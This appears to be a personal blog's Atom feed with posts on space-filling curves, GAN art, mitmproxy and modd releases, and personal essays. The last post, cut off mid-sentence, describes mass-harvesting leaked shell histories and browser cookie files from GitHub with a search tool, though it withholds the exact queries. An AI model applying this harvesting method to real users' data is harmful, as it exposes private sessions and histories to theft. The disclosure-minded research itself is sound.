corte.si 2026-01-28T00:00:00+00:00 https://corte.si/atom.xml Spacecurve 2026-01-28T00:00:00+00:00 2026-01-28T00:00:00+00:00 https://corte.si/posts/spacecurve/announce/ <p>In 2024, I noticed that I'd let my blog languish. Since the issue was urgent, I made a firm new year's resolution to address the situation in 2025. Which is why, today, in January 2026, I'm writing this post.</p> <p>I've just released <a rel="external" href="https://github.com/cortesi/spacecurve">spacecurve</a>, a new just-for-fun space-filling curve project. It's is the latest symptom of a long preoccupation with these beautiuful mathematical objects. Over the years, this preoccupation yielded blog posts like <a href="/posts/visualisation/malware/">malware visualisations</a>, a <a href="/posts/code/hilbert/portrait/">portrait of the Hilbert curve</a> and tools like <a rel="external" href="https://binvis.io">binvis.io</a>. I have a long list of related ideas I never got to but have to wanted to explore, and the first step is naturally to... rewrite it in Rust. This is just a starting point, a base for exploring ideas I have about visualisation, color spaces, and the qualities of the curves themselves.</p> <p>As part of the rewrite we now have fast base implementations of the curves themselves in the <a rel="external" href="https://crates.io/spacecurve">spacecurve</a> library, and a visual exploration tool for 2D and 3D curves in the <a rel="external" href="https://crates.io/crates/scurve">scurve</a> command-line tool. Thanks to <a rel="external" href="https://egui.rs">egui</a>, the visualiser runs both natively and in the browser.</p> <p>Click through on the images below to see the web version.</p> <div class="media-grid media-stack"> <div class="media media-frame"> <a href="&#x2F;spacecurve&#x2F;index.html"> <img src=".&#x2F;2d.png" alt="2D rendering of Spacecurve" /> </a> </div> </div> <div class="media-grid media-stack"> <div class="media media-frame"> <a href="&#x2F;spacecurve&#x2F;index.html"> <img src=".&#x2F;3d.png" alt="3D rendering of Spacecurve" /> </a> </div> </div> <h2 id="installation">Installation</h2> <p><strong>spacecurve</strong> is a Rust library for generating a variety of space-filling curves, including Hilbert, Peano, Sierpinski, Moore, and Z-order curves.</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">cargo</span><span style="color: #032F62;"> add spacecurve</span></span></code></pre> <p><strong>scurve</strong> is a command-line tool for generating and visualizing space-filling curves.</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">cargo</span><span style="color: #032F62;"> install scurve</span></span></code></pre> <p>It includes an egui interface for exploring the curves in 2D and 3D, which you can run like this:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">scurve</span><span style="color: #032F62;"> gui</span></span></code></pre><h2 id="spacecurve-web">spacecurve web</h2> <p>Because egui supports webassembly, I've also deployed the egui app to the web. Access it by clicking below, or on any of the images above.</p> <p><a href="/spacecurve/index.html">Web Viewer</a></p> Generative zoology with neural networks 2020-06-30T00:00:00+00:00 2020-06-30T00:00:00+00:00 https://corte.si/posts/code/genzoo/ <p>A couple of years ago a paper titled <em><a rel="external" href="https://arxiv.org/pdf/1710.10196.pdf">Progressive Growing of GANs for Improved Quality, Stability, and Variation</a></em> cropped up on my reading list. It describes growing <a rel="external" href="https://en.wikipedia.org/wiki/Generative_adversarial_network">generative adversarial networks</a> progressively, starting with low-resolution images, and then building up more detail as training goes on. It got quite a bit of press at the time because the authors used their idea to generate realistic, unique images of human faces.</p> <div class="media"> <a href=".&#x2F;representative_image_512x256.png"> <img src=".&#x2F;representative_image_512x256.png" /> </a> <div class="subtitle"> Representative images from the <a href='https://github.com/tkarras/progressive_growing_of_gans'>Progressive GANs repo</a> </div> </div> <p>Looking at these images, it seems like the neural net would have to learn a vast number of things to be able to do what these networks were doing. Some of this seems relatively simple and factual - say, that eye colours should match. But other aspects are fantastically complex and hard to articulate. For instance, what nuances are needed to link the configuration of eyes, mouth and skin creases into a coherent facial expression? Of course, I'm anthropomorphising a statistical machine here, and we may be fooled by our intuition - it could turn out that there are relatively few working variations, and that the solution space is more constrained than we imagine. Maybe the most interesting thing is not the images themselves, but rather the uncanny effect they have on us.</p> <p>Some time later, a <a rel="external" href="http://tetzoo.com/podcast">favourite podcast of mine</a> mentioned <a rel="external" href="http://phylopic.org/">PhyloPic</a>, a database of silhouette images of animals, plants and other lifeforms. Musing along the lines above, I wondered what would result if you trained a system like the one in the <strong>Progressive GANs</strong> paper on a very diverse dataset of this sort. Would you just generate many variations of a few known animal types, or would there be enough variation to do neural-network driven <a rel="external" href="https://blogs.scientificamerican.com/tetrapod-zoology/speculative-zoology-a-discussion/">speculative zoology</a>? However things played out, I was pretty sure I would get a few good prints for my study wall out of it, so I set out to satisfy my curiosity with an attitude of open-minded experimentation.</p> <div class="media"> <a href=".&#x2F;animated.mp4"> <video autoplay loop muted playsinline src=".&#x2F;animated.mp4"></video> </a> <div class="subtitle"> Training from random noise to competence </div> </div> <p>I adapted the <a rel="external" href="https://github.com/tkarras/progressive_growing_of_gans">code from the progressive GANs paper</a>, and trained a model for 12000 iterations using a Google Cloud instance with 8 NVIDA K80 GPUs over the complete PhyloPic dataset. Total training time, including some false starts and experiments, was 4 days. I used the final trained model to produce 50k individual images, and then spent hours poring over the results, categorising, filtering and collating images. I also did some light editing by flipping images to orient creatures in the same direction, because I found this a bit more visually satisfying. This hands-on approach means that what you see below is a sort of collaboration between me and the neural net - it did the creative work, and I edited.</p> <div class="media"> <a href="butterflies.png"> <img src=".&#x2F;butterflies-small.jpg" /> </a> <div class="subtitle"> Flying insects </div> </div> <p>The first surprising thing to me was how aesthetically pleasing the results were. Much of this is certainly a reflection of the good taste of the artists who produced the original data. However, there were also some happy accidents. For instance, it seems that whenever the neural net enters uncertain territory - whether it be fiddly bits that it hasn't quite mastered yet or complete flights of vaguely biological fantasy - chromatic aberrations begin to enter the picture. This is curious, because the input set is entirely in black and white, so colour cannot be a learned solution to some generative problem. Any colour must necessarily be a pure artefact of the mind of the machine. Delightfully, one of the things that consistently triggers chromatic aberrations are the wings of flying insects. This means that it generated hundreds and hundreds of variations of evocatively-coloured "butterflies" like the ones above. I wonder if this could be a useful observation - if you train using only black-and-white images, but demand output in full colour, splotches of colour might be a useful way to see where the model is still not able to accurately represent the training set.</p> <p>The bulk of the output is a huge variety of entirely recognisable silhouettes - birds, various quadrupeds, reams of little gracile theropod dinosaurs, sauropods, fish, bugs, arachnids and humanoids.</p> <div class="media"> <a href="birds.png"> <img src=".&#x2F;birds-small.jpg" /> </a> <div class="subtitle"> Birds </div> </div><div class="media"> <a href="quadrupeds.png"> <img src=".&#x2F;quadrupeds-small.jpg" /> </a> <div class="subtitle"> Quadrupeds </div> </div><div class="media"> <a href="dinos.png"> <img src=".&#x2F;dinos-small.jpg" /> </a> <div class="subtitle"> Dinosaurs </div> </div><div class="media"> <a href="fish.png"> <img src=".&#x2F;fish-small.jpg" /> </a> <div class="subtitle"> Fish </div> </div><div class="media"> <a href="bugs.png"> <img src=".&#x2F;bugs-small.jpg" /> </a> <div class="subtitle"> Bugs </div> </div><div class="media"> <a href="hominids.png"> <img src=".&#x2F;hominids-small.jpg" /> </a> <div class="subtitle"> Hominids </div> </div><h2 id="stranger-things">Stranger things</h2> <p>Once the known critters have been weeded out, we get to stranger things. One of the questions I had going into this was whether plausible animal body plans that don't exist in nature would emerge - perhaps hybrids of the creatures in the input set. Well, with careful search and a helpful touch of pareidolia, I found hundreds of quadrupedal birds, snake-headed deer and other fantastical monstrosities.</p> <div class="media"> <a href="mutants.png"> <img src=".&#x2F;mutants-small.jpg" /> </a> <div class="subtitle"> Monstrosities </div> </div> <p>Straying even further into the unkown, the model produced weird abstract patterns and unidentifiable entities, all with a vaguely biological, "life-ish" feel to them.</p> <div class="media"> <a href="fractals.png"> <img src=".&#x2F;fractals-small.jpg" /> </a> <div class="subtitle"> Abstract </div> </div><div class="media"> <a href="interesting.png"> <img src=".&#x2F;interesting-small.jpg" /> </a> <div class="subtitle"> Unidentifiable </div> </div><h2 id="a-random-sample">A random sample</h2> <p>What doesn't come through in the images above is the sheer abundance of variation in the results. I'm having a number of these image sets printed and framed, and the effect of hundreds of small, detailed images side by side at scale is quite striking. To give some idea of the scope of the full dataset, I'm including one of these prints below - this one is a random sample from the unfiltered corpus of images.</p> <div class="media"> <a href="large.png"> <img src=".&#x2F;large-small.jpg" /> </a> </div> Some personal thoughts on our national tragedy 2019-03-19T00:00:00+00:00 2019-03-19T00:00:00+00:00 https://corte.si/posts/personal/tragedy/ <div class="media"> <a href=".&#x2F;dunedin_mosque.jpg"> <img src=".&#x2F;dunedin_mosque.jpg" alt="Outside the Al Huda Mosque" /> </a> <div class="subtitle"> Outside the Al Huda Mosque near my home (by <a href=https://www.flickr.com/photos/mark_mcguire/46492088665>Mark McGuire</a>) </div> </div> <p>A year ago, my wife and I decided to become citizens of New Zealand. Both of our sons were born here and are full, native Kiwis. It felt odd for our family not to have this in common, and besides, our own connection with New Zealand had grown strong over the happy decade we'd lived here. It was time to take the plunge. Forms were filled in, interviews were held, and we were were notified that our citizenship ceremony would be on the 8th of February, 2018.</p> <p>On the day, we were ushered into a hall with a podium and rows of slightly uncomfortable stackable chairs. By the time we arrived it was already full of our fellow soon-to-be Kiwis, along with their friends and family. Boisterous children resisted the shushing of their parents, and there was a bit of raucous running up and down the aisles. Nobody minded. The mood was friendly, expectant, and happy. We took our seats next to a young Chinese couple, and behind a family from the UK. Many were wearing splendid traditional dress from their countries of origin - Tongan, Chinese, Thai, Indian. I myself wore a business suit, something I only do under duress. The man in front of me's stiff posture and occasional collar-stretching finger showed I wasn't alone. We were all there with common purpose - because we felt the need for a deeper commitment to our home, and perhaps a deeper sense of acceptance in turn.</p> <p>A dapper, splendid-mustached gentleman took his place at the podium, and the hall became silent. He began the kind of speech you would expect: a speech of welcome, about the rights and duties of citizenship, about the solemnity of the moment. It was at this point, in that stuffy hall, in the middle of a somewhat monotonous civil ceremony, that I was suddenly aware of a profound connection with the people around me. I felt, with complete clarity, a golden thread linking me to my wife, to the couple next to us, to the gent running the ceremony, extending outwards to everyone in the room. I felt the presence of generations of parents, stretching back in time, working to better the lives of their families, all their individual journeys leading us here, to this hall at this time. Most of all, I felt the presence of our children - all our children, the children in the room and my children, and their children, and their children's children, all joined, facing the unknowable future. This built to a sort of vision: a great, thronging, thrusting, golden river of humanity, meandering over a dark background. <em>All</em> of us together, everyone that has ever lived and everyone that ever will, shining ties binding us together each to each, all pushing ever forward in humanity's common project. For a moment between breaths, I was in touch with something transcendent, cosmically larger than me, yet something of which my own small fleck of personhood was a necessary part.</p> <p>Afterwards, people congregated in happy, smiling groups, shaking hands and hugging, having their first conversations as full citizens. I slipped out the door at the back of the hall. My wife, who knows me best, followed, holding my hand and laughing with kind-hearted amusement at how moist-eyed and emotional I was.</p> <p>That moment in the hall came back to me when I first read about the atrocity in Christchurch. I saw again the open, friendly, hopeful faces of my freshly-minted fellow citizens. I felt again the web of love that connects us all in fundamental unity. And I was suffused with an aching and overwhelming grief. Grief for the victims and their families, my countrymen and countrywomen. But grief also that anyone could have a conception of humanity so small, so narrow, and so mean as to lead to an act like this.</p> <p>In the coming weeks I'll be doing my part in the business of reckoning with our national tragedy, using the tools I have - code, data, and technology. We can do much with these, but we can't go all the way. The real work will be to look again at the human aspect our online communities, which, it has become terrifyingly clear, have become an obstacle to recognising our common purpose.</p> mitmproxy v1.0.0: Christmas Edition 2016-12-26T00:00:00+00:00 2016-12-26T00:00:00+00:00 https://corte.si/posts/code/mitmproxy/announce_1_0/ <div class="media"> <a href="http:&#x2F;&#x2F;mitmproxy.org"> <img src=".&#x2F;mitmweb_1_0.png" /> </a> </div> <p>Six years after mitmproxy's first checkin, we've finally released version 1.0.0 of the project. Our version numbering persisted below 1.0 well into the project's maturity, for reasons that are a tad difficult to explain. My mental model of software development is of an eternal pilgrimage - the roadmap of possible improvements stretches on forever, and we never quite reach a point where we look back and feel that we've arrived. From this perspective, it makes sense for 1.0 to always be out of reach. Rather than adopting more <a rel="external" href="http://www.tex.ac.uk/FAQ-TeXfuture.html">transcendental options</a>, I've stuck with simply incrementing the minor version with each release. This release sees two changes in our process. First, we're committing to a much more regular cadence, aiming for a new release every two months or so (with minor bugfix and patch releases in between). Second, each of these releases will see a major version number increment - this is v1.0, we'll release v2.0 by the end of February, and so forth. This retains something of the flavor of our previous eccentric version numbering strategy by de-emphasizing major version increments as flagfall events, without being as restrictive. Let the pilgrimage continue.</p> <p>The project's momentum continues to be excellent - since the last release, we've had 459 commits by 10 contributors, resulting in 104 closed issues and 172 closed PRs, all in just over 70 days. All this activity has resulted in a number of very significant developments.</p> <p>Over the last year, we've done a huge amount of work converting the project from Python 2 to Python 3. Our previous release straddled the two versions, retaining compatibility with Python 2.7. This release is strictly Python3-only. We are now well positioned to take full advantage of things like optional type checking, the new asyncio module and the many small and large interface improvements that Python 3 brings.</p> <p>Our user interfaces continue to improve by leaps and bounds. The console interface now has a much cleaner core, sports a number of new features like flow ordering, and has seen significant speed improvements. We're also finally releasing something we've been cooking up for quite a while - mitmweb, a web interface to mitmproxy. It's doesn't have feature parity with the console tool yet, but we feel it's ready to step onto the stage as one of our primary interfaces. Since mitmproxy console doesn't run on Windows (yet), mitmweb is the best GUI option for our Windows users for now. We're also improving our distribution mechanisms on Windows, with a new installer package kindly provided by <a rel="external" href="http://bitrock.com/">BitRock</a>. These two developments together mean much better support for our Windows users.</p> <p>At a protocol level, we're happy to announce that our support for Websockets is now mature, and enabled by default. For the moment, the best way to interact with Websockets traffic is to use our scripting mechanism - we will have support in the GUIs very soon. On the HTTP/2 front, the news is mixed. We're very happy with the quality of our own implementation of the protocol, but we've discovered that some server implementations still have problems with certain protocol edge cases. Over the last few months we found multiple bugs affecting some very prominent websites and CDNs. We are working closely with the affected companies to get these issues fixed - but big wheels turn slowly, especially when it comes to business-critical infrastructure, and all the needed repairs haven't been rolled out yet. This has left us in a bit of a quandary - we know that fixes for these issues are imminent, and we believe that the particular problems are idiosyncratic and shouldn't prompt a redevelopment of our core to make us bug-for-bug compatible. None the less, the effect is that mitmproxy's HTTP2 implementation will currently do unexpected things when talking to large sites like Twitter and Reddit. We've decided to disable HTTP/2 by default for this release - you can explicitly re-enable it using the <em>--http2</em> flag.</p> <p>Finally, if you're interested in hacking on mitmproxy, now is an excellent time to join us. Contributing is simple - pick one of the issues that we've tagged as <a rel="external" href="https://github.com/mitmproxy/mitmproxy/issues?q=is%3Aissue+is%3Aopen+label%3Agood-first-contribution">good first contributions</a>, join us on <a rel="external" href="https://slack.mitmproxy.org/">Slack</a> to discuss your approach, and then send a PR.</p> <h2 id="changelog">Changelog</h2> <ul> <li>All mitmproxy tools are now Python 3 only! We plan to support Python 3.5 and higher.</li> <li>Web-Based User Interface: Mitmproxy now offically has a web-based user interface called mitmweb. We consider it stable for all features currently exposed in the UI, but it still misses a lot of mitmproxy’s options.</li> <li>Windows Compatibility: With mitmweb, mitmproxy is now useable on Windows. We are also introducing an installer (kindly sponsored by BitRock) that simplifies setup.</li> <li>Configuration: The config file format is now a single YAML file. In most cases, converting to the new format should be trivial - please see the docs for more information.</li> <li>Console: Significant UI improvements - including sorting of flows by size, type and url, status bar improvements, much faster indentation for HTTP views, and more.</li> <li>HTTP/2: Significant improvements, but is temporarily disabled by default due to wide-spread protocol implementation errors on some large website</li> <li>WebSocket: The protocol implementation is now mature, and is enabled by default. Complete UI support is coming in the next release. Hooks for message interception and manipulation are available.</li> <li>A myriad of other small improvements throughout the project.</li> </ul> mitmproxy v0.18 2016-10-17T00:00:00+00:00 2016-10-17T00:00:00+00:00 https://corte.si/posts/code/mitmproxy/announce_0_18/ <p>We've just released <a rel="external" href="https://github.com/mitmproxy/mitmproxy/releases/tag/v0.18.1">mitmproxy v0.18</a>! Since the last release, the project has had 1399 commits by 40 contributors, resulting in 217 closed issues and 305 closed PRs, all of this in just over 189 days.</p> <p>This release is notable for a number of reasons.</p> <p>First, it contains significant contributions from our three excellent <a rel="external" href="https://developers.google.com/open-source/gsoc/">GSOC</a> students this year. Shadab Zafar worked on Python 3 compatibility and a number of aspects of mitmproxy's core. Clemens Brunner and Jason Hao made major improvements to mitmweb, the upcoming web-based interface to mitmproxy. We loved working with these guys, and hope that they will continue to hack on mitmproxy.</p> <p>Second, the project has seen some significant internal reorganisation. Previously, we were split over three separate repositories (mitmproxy, netlib and pathod). Over time, the practical headaches of keeping everything synchronised started taking a toll, and we decided to amalgamate it all in a single repo. The most immediate external effect is that installing mitmproxy (through, say, "pip install mitmproxy") now gets you all of the associated tools and libraries, including pathod and pathoc.</p> <p>Finally, 0.18 will be the last major version of mitmproxy compatible with Python 2. The next release will target Python 3.5 only, with all of the 2/3 compatibility cruft stripped out. This is not a decision we took lightly - we have a significant community of developers that have tools based on mitmproxy, and we realise this might be painful for some of them. We feel that being able to use the full features of Python 3.5 will make the transition worth it. If you have a library or tool based on mitmproxy, you should start planning for a conversion now. We'd be very happy to help you navigate the transition, so feel free to drop by the <a rel="external" href="https://slack.mitmproxy.org/">Slack channel</a> to chat to the dev team.</p> <h2 id="changelog">Changelog</h2> <ul> <li>Python 3 Compatibility for mitmproxy and pathod (Shadab Zafar, GSoC 2016)</li> <li>Major improvements to mitmweb (Clemens Brunner &amp; Jason Hao, GSoC 2016)</li> <li>Internal Core Refactor: Separation of most features into isolated Addons</li> <li>Initial Support for WebSockets</li> <li>Improved HTTP/2 Support</li> <li>Reverse Proxy Mode now automatically adjusts host headers and TLS Server Name Indication</li> <li>Improved HAR export</li> <li>Improved export functionality for curl, python code, raw http etc.</li> <li>Flow URLs are now truncated in the console for better visibility</li> <li>New filters for TCP, HTTP and marked flows.</li> <li>Mitmproxy now handles comma-separated Cookie headers</li> <li>Merge mitmproxy and pathod documentation</li> <li>Mitmdump now sanitizes its console output to not include control characters</li> <li>Improved message body handling for HTTP messages: <ul> <li>.raw_content provides the message body as seen on the wire</li> <li>.content provides the decompressed body (e.g. un-gzipped)</li> <li>.text provides the body decompressed and decoded body</li> </ul> </li> <li>New HTTP Message getters/setters for cookies and form contents.</li> <li>Add ability to view only marked flows in mitmproxy</li> <li>Improved Script Reloader (Always use polling, watch for whole directory)</li> <li>Use tox for testing</li> <li>Unicode support for tnetstrings</li> <li>Add dumpfile converters for mitmproxy versions 0.11 and 0.12</li> <li>Numerous bugfixes</li> </ul> <h2 id="contributors-for-this-release">Contributors for this release</h2> <ul> <li>Aldo Cortesi</li> <li>Angelo Agatino Nicolosi</li> <li>BSalita</li> <li>Brett Randall</li> <li>Christian Frichot</li> <li>Clemens Brunner</li> <li>Cory Benfield</li> <li>Doug Freed</li> <li>Drake Caraker</li> <li>Felix Yan</li> <li>Israel Blancas</li> <li>Jason</li> <li>Jason Pepas</li> <li>Jonathan Jones</li> <li>Kostya Esmukov</li> <li>Linmiao Xu</li> <li>Manish Kumar</li> <li>Maximilian Hils</li> <li>Ryan Laughlin</li> <li>Sachin Kelkar</li> <li>Sanchit Sokhey</li> <li>Schamper</li> <li>Shadab Zafar</li> <li>Steven Noble</li> <li>Steven Van Acker</li> <li>Tai Dickerson</li> <li>Thomas Kriechbaumer</li> <li>Tyler St. Onge</li> <li>Vincent Haupert</li> <li>Wes Turner</li> <li>Yoginski</li> <li>Zohar Lorberbaum</li> <li>arjun</li> <li>chhsiao</li> <li>jpkrause</li> <li>phackt</li> <li>redfast</li> <li>smill</li> <li>strohu</li> <li>vulnminer</li> </ul> Hobbes 2016-03-22T00:00:00+00:00 2016-03-22T00:00:00+00:00 https://corte.si/posts/personal/hobbes/ <div class="media"> <a href=".&#x2F;hobbes.jpg"> <img src=".&#x2F;hobbes.jpg" /> </a> </div> <p>Eight years ago my wife and I walked into the <a rel="external" href="https://www.catprotection.org.au/">Cat Protection Society</a> near our house in Sydney on a whim - just to look, we assured each other, and <em>most definitely</em> not to get another cat. Thirty minutes later we emerged with a box containing a tiny ball of scraggly orange fluff, a wee kitten we immediately named Hobbes. Circumstances had taken Hobbes away his mother far too early, and since I was able to work from home at the time the job of playing surrogate largely fell to me. I fed him, let him perch on my shoulder like a fluffy little malodorous parrot while I worked, and cleaned him with a cotton bud after his inept attempts to use the litter tray. He grew from a tiny scrap to a mischievous and energetic kitten, and then to a somewhat slothful but very handsome boy. Perhaps because he came to us so young, Hobbes never got on with other cats. He preferred the company of humans, and considered himself to be as much of a person as anyone else. The photo above is him in his natural habitat: draped bonelessly over my lap like a purring orange throw-rug, just being part of whatever conversation his humans are having.</p> <p>About a year ago, Hobbes started losing weight. Truth be told shedding a few pounds would probably have done him good, but this was unexplained by any change in his diet. After a series of X-rays and a biopsy we got bad news: he had lymphoma. With chemotherapy he would have a year or so of high-quality life left, but likely not much more. Apart from giving him his daily pills, there was not much we could do. We treated him to his favorite food as often as seemed sensible, and watched carefully for the moment when the scales tipped and discomfort outweighed the joy in his life.</p> <p>This morning Zoe and I took Hobbes to the vet one last time. He always hated being in the cat carrier, and would pace, tense and wide-eyed, ready to spring out like a jack-in-the-box when we opened the door. Today, he just seemed tired and sore, huddled motionlessly in an uncomfortable-looking crouch. We held him together as the vet gave him two injections - one to send him gently to sleep, and shortly after, another to stop his heart. Afterwards we brought him home and buried him under a cherry tree in our garden. Perhaps when spring comes, it will flower orange.</p> <p>Goodbye, Hobbesy. Your family will miss you. You were a good, good boy.</p> modd: a flexible tool for responding to filesystem change 2016-02-11T00:00:00+00:00 2016-02-11T00:00:00+00:00 https://corte.si/posts/modd/announce/ <p>I've just released <a rel="external" href="https://github.com/cortesi/modd">modd</a>, a new<sup class="footnote-reference"><a href="#1">1</a></sup> project of mine. Like its sister project <a rel="external" href="https://github.com/cortesi/devd">devd</a>, it's distributed as a single, self-contained binary for all major platforms - <a rel="external" href="https://github.com/cortesi/modd/releases">get it while it's fresh</a>.</p> <p>Modd is a simple tool that's hard to explain pithily. It triggers commands and manages daemons in response to filesystem changes - but that is a technically-correct mouthful that doesn't really convey how it is used. Part of the problem is that it is extremely flexible. In my projects it runs linters, does live code compiles, manages infrastructure daemons like databases, runs test instances of projects and is even rendering and live-reloading this blog post as I type. Modd replaces parts of tools like <a rel="external" href="http://gulpjs.com/">Gulp</a>, <a rel="external" href="http://gruntjs.com/">Grunt</a>, <a rel="external" href="https://ddollar.github.io/foreman/">Foreman</a> and <em>make</em>, but it can also augment them. For instance, one of my projects is entirely driven by a Makefile, with tasks invoked by modd on change.</p> <p>At modd's core is a a file change detection library that tries to get things right for most developer work patterns. It handles temporary files, VCS directories and many <a rel="external" href="https://twitter.com/cortesi/status/661316050542329856">pathological behaviors shown by common editors</a> correctly (or at least tries really hard to). The change detection algorithm waits for a lull in activity, so that jobs aren't triggered in the middle of progressive processes like renders and compiles that may touch many files. The result is change detection that is less surprising and more consistent than similar projects out there. The output of the change detection algorithm is then hooked up to a very flexible way to specify commands and manage daemons, letting you specify shell scripts that trigger on file match patterns in a single config file. Finally, there are a few mod-cons. A custom <a rel="external" href="https://github.com/cortesi/termlog">terminal logging module</a> lets modd sensibly interleave the output of possibly concurrent daemons and commands, with headings showing which command was responsible for what. Modd also has support for desktop notifications (<a rel="external" href="http://growl.info/">Growl</a> on OSX, <a rel="external" href="https://developer.gnome.org/libnotify/">libnotify</a> on Linux), letting you see things like linter output and compile editors immediately.</p> <p>Below, I'm going to show one quick example of how I use modd to do a live build/compile cycle for <a rel="external" href="https://github.com/cortesi/devd">devd</a>, a pretty standard Go project. In a future post, I'll show how I've replaced Gulp entirely for a Javascript-heavy front-end project.</p> <p>Please see the <a rel="external" href="https://github.com/cortesi/modd">modd documentation</a> for a complete explanation of the syntax and for more examples.</p> <h2 id="test-compile-cycle-for-go">Test-compile cycle for Go</h2> <p>On startup, modd looks for a file called <em>modd.conf</em> in the current directory. This file has a simple but powerful syntax - one or more blocks of commands, each of which can be triggered on changes to files matching a set of file patterns. Commands have two flavors: <strong>prep</strong> commands that run and terminate (e.g. compiling, running test suites or running linters), and <strong>daemon</strong> commands that run and keep running (e.g databases or webservers). Daemons are restarted when their block is triggered, after all prep commands have run successfully. Commands are embedded shell scripts, so shell features like redirection work, and compound, multi-step commands are common.</p> <p>Here is the simple <strong>modd.conf</strong> I use to drive the test cycle for <a rel="external" href="https://github.com/cortesi/devd">devd</a>:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>**/*.go {</span></span> <span class="giallo-l"><span> prep: go test @dirmods</span></span> <span class="giallo-l"><span>}</span></span> <span class="giallo-l"></span> <span class="giallo-l"><span>**/*.go !**/*_test.go {</span></span> <span class="giallo-l"><span> prep: go install ./cmd/devd</span></span> <span class="giallo-l"><span> daemon +sigterm: devd -ml ./tmp</span></span> <span class="giallo-l"><span>}</span></span></code></pre> <p>After the <em>modd</em> command, the commands execute for the first time, and modd is then ready to respond to changes. The initial output looks like this:</p> <div class="media"> <a href="modd-devd.png"> <img src="modd-devd.png" /> </a> </div> <p>The config file does three things:</p> <ul> <li>When any .go file changes, it runs "go test" on the affected module.</li> <li>When a non-test file changes, it compiles and installs devd.</li> <li>It keeps a test instance of the devd daemon running, and restarts it with a SIGTERM when needed.</li> </ul> <p>The one subtlety here is the <strong>@dirmods</strong> tag, which is replaced with a shell-escaped list of all directories that contain modified files. There's a similar tag - <strong>@mods</strong> - that is replaced with all matching modified files. When first run, both of these tags are replaced by all possible matches - that is, all directories containing matching files, and all matching files respectively. This means that the test suite for all the Go modules in the project is run on startup, and only for modified modules after that.</p> <div class="footnote-definition" id="1"><sup class="footnote-definition-label">1</sup> <p>In fact, this is <a rel="external" href="https://github.com/cortesi/modd/blob/master/CHANGELOG.md">release v0.2</a>, which slipped in before I had time to announce v0.1 on my blog.</p> </div> mitmproxy v0.15 2015-12-04T00:00:00+00:00 2015-12-04T00:00:00+00:00 https://corte.si/posts/code/mitmproxy/announce_0_15/ <div class="media"> <a href="http:&#x2F;&#x2F;mitmproxy.org"> <img src="..&#x2F;announce_0_12_1&#x2F;mitmproxy_0_12_1.gif" /> </a> </div> <p>We've just released <a rel="external" href="http://www.mitmproxy.org">mitmproxy 0.15</a>. This is primarily a bugfix release, but with a few really juicy long-demanded features thrown in:</p> <ul> <li>Support for loading and converting older dumpfile formats (0.13 and up)</li> <li>Content views for inline script (@chrisczub)</li> <li>Better handling of empty header values (Benjamin Lee/@bltb)</li> <li>Fix a gnarly memory leak in mitmdump</li> <li>A number of bugfixes and small improvements</li> </ul> <p>Behind the scenes, there has been a bunch of other exciting developments. The effort to port mitmproxy and its underlying libraries to Python3 continues apace. Our automated build and testing infrastructure has improved hugely - we now have <a rel="external" href="http://snapshots.mitmproxy.org">up-to-date binary snapshots built for each commit</a>.</p> <p>Thanks to all the contributors who helped get this release out the door, and, as usual, special thanks to my invaluable co-maintainer <a rel="external" href="https://maximilianhils.com/">Max</a>, who's been steering things while I've been kept busy with other things.</p> Trawling Github for cookies, bookmarks and browsing history 2015-11-26T00:00:00+00:00 2015-11-26T00:00:00+00:00 https://corte.si/posts/hacks/github-browserstate/ <p>It's a universal rule that search over a sufficiently large body of user data poses security challenges. This follows naturally from the fact that humans - even smart, informed, careful humans - occasionally slip up. Given enough data, and the ability to pick out slip-ups with search, there will always be rich pickings for a malefactor. I wrote a short series of posts a while ago about interesting things I found on Github - <a href="https://corte.si/posts/hacks/github-shhistory/">commands from shell history files</a>, <a href="https://corte.si/posts/hacks/github-pipechains/">common pipe chains</a>, and words from <a href="https://corte.si/posts/hacks/github-spellingdicts/">custom spell-check dictionaries</a>. While shell history files could definitely contain very sensitive information, in practice there were only a handful of really damaging issues in the dataset. Trawling around people's dotfile directories, I found that something much more damaging often made it into repos: browser state. It's easy to see how this could happen - it takes just one injudicious add of a hidden directory to expose cookies, browser history, bookmarks and more. I decided to return to this issue later, and it slipped off my radar until recently.</p> <p>When I wrote the first series of posts, I also released a <a rel="external" href="https://github.com/cortesi/ghrabber">tiny tool called ghrabber</a> (just a hack, really) that lets you grab files from Github en-masse using a Github code search query. The first thing I noticed when I picked it up again is that it no longer worked as expected. I used to be able to retrieve all files matching a path, like so:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;"> ghrabber.py</span><span style="color: #032F62;"> &quot;path:.bash_history&quot;</span></span></code></pre> <p>Today, this returns an error - Github now requires you to specify both a search term <strong>and</strong> a path<sup class="footnote-reference"><a href="#1">1</a></sup>. There are all sorts of possible explanations for this change, but I like to think that it's meant to prevent (or at least impede) exactly the kind of trawling I've been amusing myself with.</p> <p>Let's say we want to search for Firefox browser profile cookies. These are stored in a SQLite file called "cookie.sql". Github doesn't index binary files for search, so we can't search for characteristic content in the file. Path specification is broken, so we can't search for the filename. Stumped, right? Not so fast - the cookie files live in a directory with a large number of associated non-binary files. If we could come up with a signature for one of these accompanying files, then we could download a path relative to the match to retrieve the cookie storage file itself. I quickly <a rel="external" href="https://github.com/cortesi/ghrabber/commit/9b7909ccd594168ab8eb3d44834055b510e90273">added a flag to do exactly this to ghrabber</a>, and cooked up appropriate query strings to detect Firefox and Chrome browser profiles. I'll elide those here, for obvious reasons.</p> <h2 id="a-look-at-the-data">A look at the data</h2> <p>The result was <strong>708</strong> distinct browser profiles that included <strong>33 364</strong> bookmarks, and <strong>88 013</strong> cookies. Many of these profiles are actually intentional checkins - testing trusses, blank profiles and so forth. However, some totally unscientific manual sampling indicates that just less than half of these are probably genuine accidental checkins, containing private information.</p> <p>Let's take a light, high-level look at the data. The figure below shows the percentage of profiles with cookies from each TLD:</p> <figure> <img class="img-responsive center-block" src="./cookies.png"/> <figcaption class="text-center">Percentage of profiles with cookies from domain</figcaption> </figure> <p>As expected, the stats here are dominated by the mega-trackers that infest almost every site on the internet - a familiar cast of rogues including DoubleClick, Scorecard Research, Quantserve and so forth. It's sad to see how few domains here are genuine destinations - apparently the top sites for 